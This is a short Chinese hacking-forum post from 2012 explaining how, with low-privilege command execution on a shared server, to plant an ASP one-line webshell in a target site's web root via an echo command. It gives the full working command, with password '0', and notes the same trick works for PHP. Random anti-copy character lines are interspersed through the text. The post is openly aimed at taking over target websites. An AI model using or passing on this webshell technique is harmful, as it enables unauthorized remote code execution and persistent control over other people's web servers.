中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
2 K# u8 l; R, B' e, L; v3 M( k
) K3 r! a7 _4 m2 g# ]
命令格式
4 _# O& E* }& k. U1 p
* Q8 ~" d+ t g( l% a1 S8 v
Echo 语句 >目标站绝对目录
/ u0 n/ z6 b7 A$ ]" C6 s; Q
9 @$ C$ d% f( ?- a( H3 b
例如:
7 }! d2 n% h4 l: V7 `9 J
% U, o% N4 D2 g
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
# M0 a A3 w9 ~
- G- ], Z" m9 n9 a$ e/ Q+ n" }
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
+ z, `7 Z. |: f$ C2 e* s! H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2